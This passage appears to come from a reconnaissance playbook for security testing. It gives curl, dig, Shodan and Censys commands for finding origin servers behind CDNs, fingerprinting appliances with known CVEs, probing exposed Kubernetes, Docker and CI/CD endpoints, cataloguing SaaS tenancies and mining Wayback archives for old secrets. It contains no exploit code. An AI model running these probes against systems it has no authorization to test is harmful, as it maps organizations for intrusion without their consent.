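The filter step can be sketched with the stdlib ipaddress module. origin_candidates is a hypothetical helper, and the two Cloudflare CIDRs in the usage line are only an illustrative subset; load the full published lists before relying on the result.

```python
import ipaddress

def origin_candidates(historical_ips, cdn_cidrs):
    """Return the IPs that fall outside every supplied CDN range."""
    networks = [ipaddress.ip_network(c) for c in cdn_cidrs]
    candidates = []
    for ip in historical_ips:
        addr = ipaddress.ip_address(ip)
        # An IPv4 address is never 'in' an IPv6 network (and vice versa), so mixed lists are safe.
        if not any(addr in net for net in networks):
            candidates.append(ip)
    return candidates

print(origin_candidates(["104.16.1.1", "203.0.113.42"],
                        ["104.16.0.0/13", "172.64.0.0/13"]))
```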

Origin via certificate SAN pivot (Censys):

# Censys (free 250 queries/month with key)
censys search "services.tls.certificates.leaf_data.subject.common_name:${D} AND NOT services.tls.certificates.leaf_data.issuer.common_name:'Cloudflare'"

Or via crt.sh + manual IP check:

curl -sk "https://crt.sh/?q=%25.${D}&output=json" | jq -r '.[].name_value' | sort -u

Origin via favicon hash (Shodan):

# Compute favicon mmh3
python3 -c "
import urllib.request, codecs, mmh3
data = urllib.request.urlopen('https://target.example/favicon.ico').read()
b64 = codecs.encode(data, 'base64')
print(mmh3.hash(b64))"

# Search Shodan
shodan search "http.favicon.hash:<computed-hash>" --fields ip_str,port,org

Cross-reference with CDN ranges; non-CDN matches = origin candidates.

Origin via JARM:

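# Compute JARM (assumes the PyJARM package and its Scanner.scan(host, port) entry point)
python3 -c "
from jarm.scanner.scanner import Scanner
print(Scanner.scan('target.example', 443))
" || echo "If the import failed: pip install pyjarm"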

# Search Shodan for matching JARM
shodan search "ssl.jarm:<jarm-hash>" --fields ip_str,port

Origin via Host-header probe (validate candidate):

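CANDIDATE_IP="203.0.113.42"
# --resolve pins the hostname to the candidate IP, so both the TLS SNI and the Host header carry the real name
curl -sk -m 10 --resolve "target.example.com:443:${CANDIDATE_IP}" "https://target.example.com/" -o /tmp/candidate.html
diff <(curl -sk -m 10 https://target.example.com/) /tmp/candidate.html | head -50

If small/no diff → likely origin (per-request tokens such as nonces and timestamps can still differ). Document with detectability=low.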
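
A raw diff is noisy when pages embed per-request tokens. One way to score "small diff" is a similarity ratio after stripping volatile strings; the sketch below assumes that approach. same_site, the 0.9 threshold and the token regex are all hypothetical choices to tune per target.

```python
import difflib
import re

# Long hex strings and long digit runs are treated as per-request noise (assumption).
_VOLATILE = re.compile(r"[0-9a-fA-F]{16,}|\d{10,}")

def same_site(cdn_html: str, candidate_html: str, threshold: float = 0.9) -> bool:
    """True when the two bodies are near-identical once volatile tokens are removed."""
    a = _VOLATILE.sub("", cdn_html)
    b = _VOLATILE.sub("", candidate_html)
    return difflib.SequenceMatcher(None, a, b).ratio() >= threshold

live = "<html><title>Acme</title><input value='0123456789abcdef0123'></html>"
cand = "<html><title>Acme</title><input value='fedcba98765432100000'></html>"
print(same_site(live, cand))
```

SequenceMatcher is quadratic in the worst case, so truncate very large bodies before comparing.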

Origin via auxiliary subdomains (often skip CDN):

for sub in mail smtp ftp sftp cpanel webmail direct origin direct-connect noproxy \
           dev staging stg uat preprod sandbox preview origin-www old-www legacy \
           server srv host1 host2 vps server1; do
  echo "=== ${sub}.${D} ==="
  dig +short A "${sub}.${D}"
done | grep -vE '^(===|$)' | sort -u

Cross-reference any returned IP against CDN ranges.

Origin via email-header bounce:

Send mail to <random>@${D} from a sock-puppet account. The bounce often includes Received: headers showing the inbound mail server's actual IP — sometimes co-located with web origin.

Origin via misconfigured CDN error pages:

Some CDN 5xx error pages historically leaked upstream details. Trigger errors and inspect:

# Trigger CDN-side 5xx (oversized request, malformed Host)
curl -sk -m 10 -H "Host: " "https://target.example/" -o /tmp/err.html
curl -sk -m 10 -H "X-Forwarded-For: $(python3 -c 'print("a"*8000)')" "https://target.example/"
grep -iE 'origin|upstream|server|backend|cf-ray' /tmp/err.html

16.16 Vendor Product Fingerprints

Common edge appliances / products on the target's perimeter, with fingerprint paths and notes on common CVEs.

Product | Fingerprint paths | Notes
Citrix NetScaler / Gateway | /vpn/index.html, /logon/LogonPoint/tmindex.html, /citrix/ | Version in HTML; CVE-2023-3519 (RCE), CVE-2019-19781 (path traversal RCE); both KEV-listed.
F5 BIG-IP TMUI | /tmui/login.jsp, /mgmt/tm/sys/ | Banner reveals version; CVE-2022-1388 (auth bypass), CVE-2023-46747; both KEV-listed.
Cisco ASA / AnyConnect | /+CSCOE+/, /CSCOE/index.html, /webvpn.html, /+CSCOE+/portal.html | CVE-2020-3452 (file read), CVE-2018-0101 (RCE).
Pulse Secure / Ivanti Connect | /dana-na/, /dana-na/auth/url_default/welcome.cgi, /api/v1/ | CVE-2023-46805 (auth bypass, KEV) chained with CVE-2024-21887 (command injection, KEV).
FortiGate / FortiOS | /remote/login, /remote/info, /api/v2/ | CVE-2022-42475 (RCE, KEV), CVE-2024-21762 (RCE, KEV).
PaloAlto GlobalProtect | /global-protect/, /global-protect/portal/css/login.css, /api/?type=keygen | CVE-2024-3400 (RCE, KEV), CVE-2019-1579.
VMware Horizon | /portal/info.jsp, /broker/xml, /login.jsp | Log4Shell exposure (CVE-2021-44228, KEV).
VMware vCenter | /sdk, /ui/, /vsphere-client/, /websso/SAML2/ | CVE-2021-21972 (RCE, KEV), CVE-2021-22005.
VMware ESXi | /sdk, /ui/, /folder | CVE-2021-21974 (heap overflow → ESXiArgs ransomware, KEV).
Microsoft Exchange OWA | /owa/, /ews/exchange.asmx, /ecp/ | ProxyShell (CVE-2021-34473), ProxyLogon (CVE-2021-26855), ProxyNotShell (CVE-2022-41040); all KEV.
WatchGuard Firebox | /auth/, /wgcgi.cgi | CVE-2022-26318 (CGI).
SonicWall SMA | /cgi-bin/welcome, /__api__/v1/, /diagnostics/ | CVE-2021-20016, CVE-2024-40766 (KEV).
Sophos UTM/XG/XGS | /userportal/, /webconsole/, /cgi-bin/ | CVE-2022-1040 (RCE, KEV).
Check Point R80/R81 | /sslvpn/portal/, /clients/ | CVE-2024-24919 (KEV).
Zoho ManageEngine | /RestAPI/Login, /api/json/v2/ | Multiple RCE CVEs; check version.
Atlassian Confluence | /confluence/, /login.action, /rest/api/space | CVE-2022-26134 (OGNL RCE, KEV), CVE-2023-22515 (KEV).
Atlassian Jira | /secure/Dashboard.jspa, /rest/api/2/serverInfo | Multiple CVEs; check version.
GitLab self-hosted | /users/sign_in, /-/oauth/applications, /help | Version in HTML footer; CVE-2021-22205 (RCE, KEV).
Telerik UI | /Telerik.Web.UI.WebResource.axd?type=rau | CVE-2017-9248, CVE-2019-18935; old but still found.
ConnectWise ScreenConnect | /SetupWizard.aspx, /Bin/SetupWizard.aspx | CVE-2024-1709 (auth bypass, KEV).
SolarWinds Orion | /Orion/Login.aspx | CVE-2020-10148 (Orion API auth bypass, tied to SUPERNOVA); also check for builds affected by the SUNBURST supply-chain compromise, which has no CVE of its own.
Kaseya VSA | /dl.asp, /userFilterTableRpt.asp | CVE-2021-30116 (REvil supply-chain).
Microsoft IIS / OWA misc | Server: Microsoft-IIS/<version> | Old versions = old CVEs; check.
Cisco Smart Install | port 4786 open | CVE-2018-0171 (smart install client mode RCE).

Per-vendor probe pattern:

T="https://target.example"
# Citrix
curl -sk -m 10 "$T/vpn/index.html" -o /tmp/c1 -w '%{http_code}\n'
grep -iE 'NetScaler|Citrix|version' /tmp/c1
# F5
curl -sk -m 10 "$T/tmui/login.jsp" -o /tmp/c2 -w '%{http_code}\n'
grep -iE 'BIG-IP|version' /tmp/c2
# (etc — repeat per product)

Auto-fingerprint with Nuclei:

nuclei -u $T -t http/technologies/ -severity info,low,medium,high,critical
nuclei -u $T -t http/cves/ -severity high,critical -etags fuzz

16.17 Cloud-Native Service Fingerprints

Modern apps deploy on serverless / managed services. Fingerprint the platform from the URL pattern.

Provider | URL pattern | Notes
AWS Lambda Function URL | *.lambda-url.<region>.on.aws | Direct invocation; check IAM auth posture.
AWS App Runner | *.<region>.awsapprunner.com | Managed container; usually behind auth.
AWS API Gateway | *.execute-api.<region>.amazonaws.com | REST/HTTP/WebSocket; check authorizer config.
AWS CloudFront | d[a-z0-9]+\.cloudfront\.net (a "d" followed by a short alphanumeric ID) | Distribution; origin behind it (see §16.15).
AWS ALB / ELB | *.<region>.elb.amazonaws.com (ALB / Classic), *.elb.<region>.amazonaws.com (NLB) | Behind = EC2 / ECS.
AWS Amplify | *.amplifyapp.com | Static + Lambda backend.
Google Cloud Run | *.run.app (and *.<region>.run.app) | Container; check public-vs-IAM auth.
Google Cloud Functions | <region>-<project>.cloudfunctions.net | Serverless.
Google App Engine | *.appspot.com | Older serverless.
Azure Functions | *.azurewebsites.net (also App Service) | Function App behind same domain pattern.
Azure Container Apps | *.azurecontainerapps.io | Containers.
Azure Static Web Apps | *.azurestaticapps.net | Static + Functions.
Vercel | *.vercel.app, *.now.sh (legacy) | Frontend + serverless.
Netlify | *.netlify.app, *.netlify.com | Frontend + functions.
Cloudflare Workers | *.workers.dev | Edge functions.
Cloudflare Pages | *.pages.dev | Static + functions.
Heroku | *.herokuapp.com | Dynos.
Render | *.onrender.com | Container/static.
Fly.io | *.fly.dev | Edge containers.
Railway | *.railway.app | App platform.
DigitalOcean App Platform | *.ondigitalocean.app | Static + container.

For each pattern:

  • Confirm public vs auth-required (HEAD / GET).
  • Check CORS posture.
  • For Lambda Function URLs / Cloud Run / Cloud Functions: check whether IAM auth is enforced (anonymous invocation = HIGH finding).
  • For static + functions hybrids (Vercel/Netlify/Cloudflare Pages): the function paths are usually /api/*; enumerate via JS extraction.
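
Platform fingerprinting from a hostname is a regex lookup. The sketch below loads a handful of the patterns from the table; PLATFORM_PATTERNS and classify_host are hypothetical names, and the list is deliberately incomplete.

```python
import re

# (regex, platform) pairs; a subset of the table, matched against the full hostname.
PLATFORM_PATTERNS = [
    (r"\.lambda-url\.[a-z0-9-]+\.on\.aws$", "AWS Lambda Function URL"),
    (r"\.execute-api\.[a-z0-9-]+\.amazonaws\.com$", "AWS API Gateway"),
    (r"^d[a-z0-9]+\.cloudfront\.net$", "AWS CloudFront"),
    (r"\.run\.app$", "Google Cloud Run"),
    (r"\.cloudfunctions\.net$", "Google Cloud Functions"),
    (r"\.azurewebsites\.net$", "Azure Functions / App Service"),
    (r"\.vercel\.app$", "Vercel"),
    (r"\.workers\.dev$", "Cloudflare Workers"),
    (r"\.herokuapp\.com$", "Heroku"),
]

def classify_host(host: str):
    """Return the first matching platform name, or None."""
    h = host.lower().rstrip(".")
    for pattern, platform in PLATFORM_PATTERNS:
        if re.search(pattern, h):
            return platform
    return None

for h in ["abc123.lambda-url.eu-west-1.on.aws", "d111111abcdef8.cloudfront.net", "www.target.example"]:
    print(h, "->", classify_host(h))
```

Run it over CNAME targets from the DNS sweep as well as over hostnames found in JS bundles.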

16.18 Container & Kubernetes Exposure

Increasingly common; often forgotten when behind a NAT.

Target | Port | Probe | Severity if exposed
Docker API (unencrypted) | 2375 | curl -sk -m 5 http://${IP}:2375/v1.40/info | CRITICAL (container/host takeover)
Docker API (TLS) | 2376 | curl -sk -m 5 https://${IP}:2376/v1.40/info | HIGH (cert validation bypass possible)
Kubernetes API server | 6443 / 8443 | curl -sk -m 5 https://${IP}:6443/api | HIGH if system:anonymous returns non-403
Kubernetes Dashboard | 8001 / 9090 / 30000+ | curl -sk -m 5 http://${IP}:8001/api/v1/namespaces/kube-system/services/kubernetes-dashboard | HIGH if reachable
kubelet | 10250 (HTTPS), 10255 (HTTP, deprecated) | curl -sk -m 5 https://${IP}:10250/pods | CRITICAL (no auth = pod exec)
etcd | 2379 (client), 2380 (peer) | curl -sk -m 5 https://${IP}:2379/v2/keys/ (v2) or etcdctl --endpoints=${IP}:2379 get "" --prefix --keys-only (v3) | CRITICAL (cluster state + secrets)
kube-proxy | 10256 | curl http://${IP}:10256/healthz | INFO
kube-controller-manager | 10257 | curl -k https://${IP}:10257/metrics | MEDIUM
kube-scheduler | 10259 | curl -k https://${IP}:10259/metrics | MEDIUM
cAdvisor | 4194 (deprecated) | curl http://${IP}:4194/metrics | LOW (resource metrics)
Helm Tiller (Helm 2; deprecated but found) | 44134 | helm --host ${IP}:44134 list | HIGH (Tiller had cluster-admin)

Public container registries to check for leaks:

Registry | Search pattern
Docker Hub | https://hub.docker.com/search?q=<target-keyword>&type=image
Quay (Red Hat) | https://quay.io/search?q=<target-keyword>
GitHub Container Registry (GHCR) | enumerable via GitHub API: https://api.github.com/orgs/<org>/packages?package_type=container
Amazon ECR Public | https://gallery.ecr.aws/?searchTerm=<keyword>
Azure Container Registry (public) | varies; check for *.azurecr.io
Google Container Registry (public) | https://console.cloud.google.com/gcr/images/<project>?project=<project>

Per-image scan workflow:

  1. docker pull <registry>/<image>:<tag> (or skopeo inspect).
  2. docker save <image> -o /tmp/img.tar.
  3. Extract layers; scan with secret catalog (§17).
  4. Inspect Dockerfile history (docker history <image>) — sometimes reveals build args or COPY of secrets.

16.19 CI/CD Platform Exposure

Platform | Common exposure | Probe
Jenkins | /script (Groovy console = RCE if no auth), /asynchPeople/, /jnlpJars/jenkins-cli.jar, /computer/, /job/<name>/api/json | curl -sk -m 10 "${T}/script" and curl -sk -m 10 "${T}/asynchPeople/api/json"
GitLab self-hosted | /users/sign_in (version in HTML), /-/oauth/applications (auth-required), /api/v4/version, /-/snippets/<id>/raw | curl -sk -m 10 "${T}/api/v4/version"
GitHub Actions workflow files | .github/workflows/*.yml in any public repo | Search via GitHub code search: path:.github/workflows extension:yml secrets
CircleCI config | .circleci/config.yml in any repo | Search: path:.circleci/config.yml
TeamCity | /login.html, /agent.html?agentId=*, /admin/admin.html | curl -sk -m 10 "${T}/login.html", then grep -i 'TeamCity' for version disclosure. CVE-2024-27198 (KEV).
Bamboo (Atlassian) | /userlogin.action, /rest/api/latest/info | curl -sk -m 10 "${T}/rest/api/latest/info"
Drone CI | /api/info, /login | curl -sk -m 10 "${T}/api/info"
Travis CI (legacy) | .travis.yml in repos; https://api.travis-ci.com/repos/<owner>/<repo> | API often exposes build env.
Argo CD | /api/version, /applications | curl -sk -m 10 "${T}/api/version". Check anonymous-auth posture.
Tekton | /apis/tekton.dev/v1beta1/pipelineruns (K8s native) | Enumerate via K8s API.
Spinnaker | /gate/info, /applications | curl -sk -m 10 "${T}/gate/info"
Buildkite | per-org dashboards; usually behind auth. | Check public agents page.

GitHub Actions secret-leak patterns to look for in workflows:

# Anti-pattern: secret echoed to log
run: echo "${{ secrets.MY_API_KEY }}"

# Anti-pattern: secret in environment without mask
env:
  KEY: ${{ secrets.MY_API_KEY }}
run: ./deploy.sh   # script may echo $KEY

# Anti-pattern: pull_request_target with checkout of fork code (CVE class)
on: pull_request_target
jobs:
  test:
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # checks out fork code with secrets in env
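
These anti-patterns can be flagged with a plain-text pass over workflow files, no YAML parser needed. The sketch is a heuristic under stated assumptions: audit_workflow is a hypothetical helper, it only catches the literal forms shown above, and every hit needs manual review.

```python
import re

def audit_workflow(text: str) -> list:
    """Flag two of the anti-patterns above in one workflow file's text."""
    findings = []
    # pull_request_target combined with a checkout of the PR head = fork code runs with secrets.
    if re.search(r"\bpull_request_target\b", text) and \
       re.search(r"github\.event\.pull_request\.head\.(sha|ref)", text):
        findings.append("pull_request_target with checkout of fork code")
    # A secret expanded on the same line as echo lands in the step's command line.
    for number, line in enumerate(text.splitlines(), 1):
        if re.search(r"\becho\b.*\$\{\{\s*secrets\.", line):
            findings.append(f"line {number}: secret echoed to log")
    return findings

sample = (
    "on: pull_request_target\n"
    "jobs:\n"
    "  test:\n"
    "    steps:\n"
    "      - uses: actions/checkout@v3\n"
    "        with:\n"
    "          ref: ${{ github.event.pull_request.head.sha }}\n"
    '      - run: echo "${{ secrets.MY_API_KEY }}"\n'
)
print(audit_workflow(sample))
```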

16.20 Documentation / Wiki Leak Paths

Public-share features on collaboration platforms regularly leak.

Platform | URL pattern | What's exposed
Notion (publish page) | *.notion.site/<slug> or notion.so/<workspace>/<page-id> | Public page; sometimes whole workspaces published by accident.
Confluence Cloud (anonymous) | <target>.atlassian.net/wiki/spaces/ | Public spaces; check /wiki/display/<SPACE>/.
Atlassian Service Desk | <target>.atlassian.net/servicedesk/customer/portal/<N> | Sometimes lists all internal request types.
Trello board | https://trello.com/b/<id>/<slug> | Public board with cards; check via Google site:trello.com "${target}".
Asana public project | https://app.asana.com/0/<id>/<id> | Public project view.
ReadTheDocs | <project>.readthedocs.io | Hosted docs; "private builds" sometimes default to public.
GitBook | <workspace>.gitbook.io/<book>/ | Published docs; sometimes contain internal SOPs.
MkDocs / Docusaurus on subdomain | docs.<target> | Often contains internal architecture diagrams + setup notes.
Slab | <workspace>.slab.com/posts/<id> | Published posts.
Coda | coda.io/d/<doc-id> | Public docs.
Miro | https://miro.com/app/board/<id>/ | Public boards (often architecture diagrams).
Lucidchart | https://lucid.app/lucidchart/<id>/view | Public diagrams.
Figma | https://www.figma.com/file/<key>/ | Public design files; sometimes leak product spec.
GitHub Wiki | github.com/<org>/<repo>/wiki | Public wikis; check stale ones.
Linear | linear.app/<workspace>/issue/<id> | Public issues (rare but happens).
Confluence anonymous server | <target>/confluence/, <target>/wiki/ (self-hosted) | Anonymous read sometimes left on.
Monday.com | view.monday.com/<id> | Shared boards.
Wrike | app.wrike.com/external/<id> | External-shared spaces.

Dork-driven discovery:

site:notion.site "{target}"
site:notion.so "{target}"
site:atlassian.net "{target}"
site:trello.com "{target}"
site:miro.com "{target}"
site:lucid.app "{target}"
site:figma.com "{target}"
site:asana.com "{target}"
site:gitbook.io "{target}"
site:readthedocs.io "{target}"

16.21 WHOIS / RDAP / Historical

WHOIS gives current registrant; RDAP is the structured replacement; historical WHOIS is the pivot gold.

Current WHOIS:

whois target.example                              # standard CLI
curl -sk -m 10 "https://www.whois.com/whois/${D}"  # web fallback

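RDAP (RFC 7480 family; JSON responses defined in RFC 9083):

# rdap.org is a public redirector to the authoritative registry RDAP server, so follow redirects with -L
curl -skL "https://rdap.org/domain/${D}" | jq .
# IANA bootstrap registry: maps each TLD to its RDAP base URL
curl -sk "https://data.iana.org/rdap/dns.json" | jq .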

What to extract from WHOIS / RDAP:

  • Registrant: name, org, email, phone, address (often redacted post-GDPR but not always for non-EU registrants).
  • Registrar: enables registrar-account pivot for related domains.
  • Created / updated / expiry dates: pattern of bulk registrations = same registrant.
  • Nameservers: NS reuse pivot.
  • Status flags (clientHold, clientTransferProhibited, etc.) = posture indicators.
  • Abuse contact: useful for responsible disclosure (§30).
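
RDAP answers are JSON, so the extraction list above can be automated. A minimal sketch, assuming the standard RDAP domain object layout (events, nameservers, status, entities with a jCard vcardArray); summarize_rdap is a hypothetical helper and registries vary in which fields they populate.

```python
def summarize_rdap(doc: dict) -> dict:
    """Pull registrar, key dates, nameservers and status flags from an RDAP domain object."""
    events = {e.get("eventAction"): e.get("eventDate") for e in doc.get("events", [])}
    registrar = None
    for entity in doc.get("entities", []):
        if "registrar" in entity.get("roles", []):
            # vcardArray is ["vcard", [[name, params, type, value], ...]]
            for item in entity.get("vcardArray", ["vcard", []])[1]:
                if item[0] == "fn":
                    registrar = item[3]
    return {
        "registrar": registrar,
        "created": events.get("registration"),
        "expires": events.get("expiration"),
        "nameservers": sorted(ns.get("ldhName", "").lower() for ns in doc.get("nameservers", [])),
        "status": doc.get("status", []),
    }

example = {
    "status": ["client transfer prohibited"],
    "events": [{"eventAction": "registration", "eventDate": "2010-05-01T00:00:00Z"}],
    "nameservers": [{"ldhName": "NS1.TARGET.EXAMPLE"}],
    "entities": [{"roles": ["registrar"],
                  "vcardArray": ["vcard", [["version", {}, "text", "4.0"],
                                           ["fn", {}, "text", "Example Registrar"]]]}],
}
print(summarize_rdap(example))
```

Pipe the curl output into json.loads and pass the result in; identical nameserver sets and clustered creation dates across domains are the pivot signals.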

Historical WHOIS:

Pre-GDPR records often have unredacted contact info. Sources:

Source | Notes
DomainTools | Paid; gold-standard; full WHOIS history.
WhoisXML API | Paid; bulk + history.
SecurityTrails | Paid; WHOIS + DNS history.
viewdns.info | Free WHOIS history (limited).
whoisology.com | Paid; reverse WHOIS by registrant email.

Reverse-WHOIS pivots:

If you have a registrant email, search "every domain registered by this email":

# DomainTools (paid)
curl -sk -H "X-API-Username: ..." -H "X-API-Key: ..." \
  "https://api.domaintools.com/v1/reverse-whois/?terms=admin@target.example"

This finds adjacent corporate assets (subsidiary domains, brand variations, employee personal projects on corp email).

16.22 DNS Record Catalog (TXT verification tokens, MX→IdP)

For every target domain, dump all common record types:

D="target.example"
for rtype in A AAAA MX TXT NS SOA CAA SRV CNAME PTR; do
  echo "=== ${rtype} ==="
  dig +short "${D}" "${rtype}"
done

TXT record verification token catalog (each token reveals a SaaS tenancy):

TXT pattern | SaaS / service | Implication
google-site-verification=<token> | Google Workspace / Search Console / Analytics | Google tenancy.
MS=ms<digits> | Microsoft 365 (older) | M365 tenancy.
apple-domain-verification=<token> | Apple Business Manager / iCloud Calendar | Apple ecosystem.
atlassian-domain-verification=<token> | Atlassian Cloud (Jira/Confluence/etc.) | Atlassian customer.
facebook-domain-verification=<token> | Facebook Business / Pixel | FB Business.
adobe-idp-site-verification=<token> | Adobe Sign / Creative Cloud | Adobe customer.
docusign=<token> | DocuSign | DocuSign customer.
dropbox-domain-verification=<token> | Dropbox Business | Dropbox customer.
box-verification=<token> | Box | Box customer.
webexdomainverification.<id> | Webex | Cisco Webex.
zoom_verify_<id> | Zoom | Zoom customer (admin domain).
notion=<token> (rare) | Notion workspace | Notion enterprise.
slack-domain-verification=<token> | Slack Enterprise Grid | Slack EG.
asana-domain-verification=<token> | Asana Enterprise | Asana customer.
mongodb-site-verification=<token> | MongoDB Atlas | DB tenant.
_dnsauth.<host> (record name, not value) | DigiCert DCV / Azure Front Door custom-domain validation | Domain-control validation for that host. ACME DNS-01 challenges (Let's Encrypt etc.) live at _acme-challenge.<host> instead.
pinterest-site-verification=<token> | Pinterest Business | Marketing surface.
cisco-ci-domain-verification=<token> | Cisco Spark / Webex | Cisco.
_globalsign-domain-verification=<token> | GlobalSign cert authority | Cert provider.
mailru-verification:<token> | Mail.ru | RU presence.
yandex-verification:<token> | Yandex services | RU presence.
zscaler-verification-<id>-<date>-<random> | Zscaler (ZIA / ZPA / ZDX) | Web SSE / SASE customer; the date suffix is the verification-issued date.
cloudflare-verify=<token> | Cloudflare (Zero Trust / Access / WARP) | Cloudflare org-tier customer.
autosect-site-verification=<token> | AutoSect (security tooling) | Security vendor on tenant.
cisco-site-verification=<token> | Cisco (various products) | Cisco vendor.
mscid=<token> | Microsoft (newer M365 verification) | M365 tenancy (newer format).
_amazonses.<domain> (record name; value is the token) | AWS SES sender verification | SES sender.
salesforce-domain-verification=<token> | Salesforce | SF customer.
workday-domain-verification=<token> | Workday | Workday customer (HR + Finance).
shopify-domain-verification=<token> | Shopify | E-commerce customer.
klaviyo-domain-verification=<token> | Klaviyo | Marketing automation.
mailchimp-domain-verification=<token> | Mailchimp | Marketing email.
hubspot-domain-verification=<token> | HubSpot | CRM / marketing.
zendesk-verification=<token> | Zendesk | Support tenancy (also see §43).
freshworks-verification=<token> | Freshworks | Support / CRM customer.
intercom-verification=<token> | Intercom | Messaging tenancy.
loom-site-verification=<token> | Loom | Video.
miro-site-verification=<token> | Miro | Whiteboard tenancy.
gitlab-domain-verification=<token> | GitLab | Self-hosted or cloud verification.

Each discovered tenancy is a separate attack surface (own credentials, own MFA posture, own data).
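
Turning a TXT dump into a tenancy list is a prefix match against the catalog. The sketch loads only a few catalog entries; TXT_PREFIXES and tenancies are hypothetical names, and the map should be filled from the full table.

```python
# Lowercased value prefixes from the catalog above (subset).
TXT_PREFIXES = {
    "google-site-verification=": "Google",
    "ms=": "Microsoft 365",
    "atlassian-domain-verification=": "Atlassian Cloud",
    "docusign=": "DocuSign",
    "slack-domain-verification=": "Slack Enterprise Grid",
    "zendesk-verification=": "Zendesk",
}

def tenancies(txt_records) -> list:
    """Return the sorted set of services whose verification token appears in the TXT values."""
    found = set()
    for record in txt_records:
        value = record.strip().strip('"').lower()
        for prefix, service in TXT_PREFIXES.items():
            if value.startswith(prefix):
                found.add(service)
    return sorted(found)

print(tenancies(['"MS=ms12345678"', '"v=spf1 -all"', '"docusign=0a1b2c"']))
```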

Autodiscover-as-confirmation pattern:

autodiscover.<domain> resolving to Microsoft IP space (e.g. 40.96.0.0/13, 52.96.0.0/14, parts of 13.107.0.0/16), usually via a CNAME to autodiscover.outlook.com, is strong evidence of M365 Exchange Online tenancy, even when MX records are obscured by Mimecast/Proofpoint/Barracuda inbound filtering. Probe:

Resolve-DnsName "autodiscover.$D" -Type A | Select Name,IPAddress

If IPs are in Microsoft ranges → M365_CONFIRMED. Cross-reference with getuserrealm.srf (§22.1) for tenant GUID extraction.

CAA records:

dig +short CAA "${D}"

Lists which CAs are allowed to issue certs. Absence = LOW finding (any CA can mis-issue). Presence + restrictive list = good posture.

SOA serial pattern analysis:

dig +short SOA "${D}"

Serial format YYYYMMDDNN reveals last-edit date. Pattern across multiple zones can correlate ownership.
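
A sketch of the serial decoding, assuming the zone follows the YYYYMMDDNN convention. soa_serial_date is a hypothetical helper; serials in other schemes (Unix timestamps, plain counters) return None instead of a guessed date.

```python
from datetime import date

def soa_serial_date(serial):
    """Decode a YYYYMMDDNN serial into (edit_date, revision); None if it does not fit."""
    s = str(serial)
    if len(s) != 10 or not s.isdigit():
        return None
    year, month, day, revision = int(s[:4]), int(s[4:6]), int(s[6:8]), int(s[8:])
    if not 1990 <= year <= 2100:                 # plausibility window (assumption)
        return None
    try:
        return date(year, month, day), revision
    except ValueError:                           # e.g. month 34 from a Unix timestamp
        return None

print(soa_serial_date(2024031502))
```

The serial is the third field of dig +short SOA output.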

16.23 Wayback CDX Deep Usage

The Wayback Machine has a structured query API.

Basic CDX query:

D="target.example"
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*&output=json&fl=timestamp,original&limit=10000"

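Returns a JSON array of [timestamp, original_url] rows. With output=json the first row is the field-name header, which is why jq filters on this output start at .[1:].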

Useful filters:

  • &from=20200101&to=20231231 — date range.
  • &filter=mimetype:application/json — only JSON responses (often APIs).
  • &filter=mimetype:application/javascript — JS bundles.
  • &filter=statuscode:200 — only successful captures.
  • &filter=urlkey:.*api.* — only URLs containing "api".
  • &collapse=urlkey — dedup by URL.
  • &collapse=digest — dedup by content (catches identical pages re-archived).
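
Composing these filters by hand invites encoding mistakes, so here is a sketch that builds the query string and strips the header row from the response. cdx_url and cdx_rows are hypothetical helpers; only parameters named in this section are used, and the fetch itself is left to curl or urllib.

```python
import json
from urllib.parse import urlencode

CDX_ENDPOINT = "https://web.archive.org/cdx/search/cdx"

def cdx_url(domain, filters=(), collapse=None, limit=10000):
    """Build a CDX query for every capture under a domain; filters repeat as separate params."""
    params = [("url", f"{domain}/*"), ("output", "json"),
              ("fl", "timestamp,original"), ("limit", str(limit))]
    params += [("filter", f) for f in filters]
    if collapse:
        params.append(("collapse", collapse))
    return CDX_ENDPOINT + "?" + urlencode(params)

def cdx_rows(body: str) -> list:
    """Parse an output=json response and drop the header row."""
    data = json.loads(body) if body.strip() else []
    return [tuple(row) for row in data[1:]]

print(cdx_url("target.example",
              filters=["statuscode:200", "mimetype:application/json"],
              collapse="urlkey"))
```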

Get specific snapshot:

TS="20231215120000"
URL="https://target.example/admin/dashboard"
curl -sk "https://web.archive.org/web/${TS}/${URL}"

Diff snapshot vs live:

LIVE=$(curl -sk -m 10 "${URL}")
ARCHIVED=$(curl -sk -m 10 "https://web.archive.org/web/${TS}/${URL}")
diff <(echo "$LIVE") <(echo "$ARCHIVED") | head -100

Save current page:

curl -sk -X POST "https://pragma.archivelab.org/" \
  -H 'Content-Type: application/json' \
  -d '{"url":"https://target.example/admin"}'

Find every archived JS:

curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.js&output=json&fl=timestamp,original&filter=statuscode:200" | \
  jq -r '.[1:][] | "\(.[0]) \(.[1])"'

For each, fetch the archived JS and run the secret catalog (§17). Old JS often had hard-coded keys later removed.

Legacy-app pivot (when *.js returns empty):

Static brochure-ware sites (older corporate sites, especially pre-2015) often have zero archived JS because the frontend was server-rendered. Pivot to legacy file extensions:

# ASP / ASP.NET classic
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.asp&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=500"

# PHP
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.php&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=500"

# JSP / .NET aspx / CGI / Coldfusion
for ext in aspx jsp cgi cfm; do
  echo "=== .$ext ==="
  curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.${ext}&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=200"
done

# JSON / XML config (sometimes leaks endpoints + creds)
for ext in json xml yml yaml ini conf; do
  echo "=== .$ext ==="
  curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.${ext}&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=100"
done

# Anything indexed (broad sweep — useful for legacy enumeration)
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=10000"

Legacy .asp / .cfm / .jsp URLs often reveal: forgotten admin panels, old user-enum endpoints, legacy auth flows, SQL-injection-prone parameters. Cross-reference with current DNS — many legacy hosts now NXDOMAIN but the URL paths sometimes survive on a renamed host.

16.24 Common-Prefix Subdomain Sweep (active, low-detectability)

